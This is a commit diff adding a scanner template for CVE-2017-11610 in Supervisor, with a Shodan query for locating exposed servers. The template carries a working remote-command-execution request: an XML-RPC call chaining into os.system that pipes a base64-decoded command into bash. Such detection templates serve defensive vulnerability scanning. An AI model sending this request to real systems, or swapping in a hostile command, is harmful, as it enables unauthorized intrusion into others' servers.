Added CVE-2017-11610.yaml template

2021-11-15 18:27:25 -05:00 · 2021-11-15 18:27:25 -05:00 · 92f82dd083
parent 4f88a66890
commit 92f82dd083
1 changed files with 50 additions and 0 deletions
--- a/cves/2017/CVE-2017-11610.yaml
+++ b/cves/2017/CVE-2017-11610.yaml
@ -0,0 +1,50 @@
+id: CVE-2017-11610
+
+info:
+  name: Supervisor XMLRPC Exec (CVE-2017-11610)
+  author: notnotnotveg
+  severity: critical
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
+  description: Typically runs on port tcp/9001
+  tags: cve,cve2017,rce,supervisor
+  metadata:
+    shodan-query: 'http.title:"Supervisor Status"'
+
+requests:
+  - payloads:
+
+    raw:
+      - |
+        POST /RPC2 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/xml
+        Content-type: text/xml
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Content-Length:
+
+        <methodCall>
+          <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
+          <params>
+            <param>
+              <string>echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
+            </param>
+          </params>
+        </methodCall>
+
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<methodResponse>"
+        part: body
+      - type: word
+        words:
+          - "<int>0</int>"
+        part: body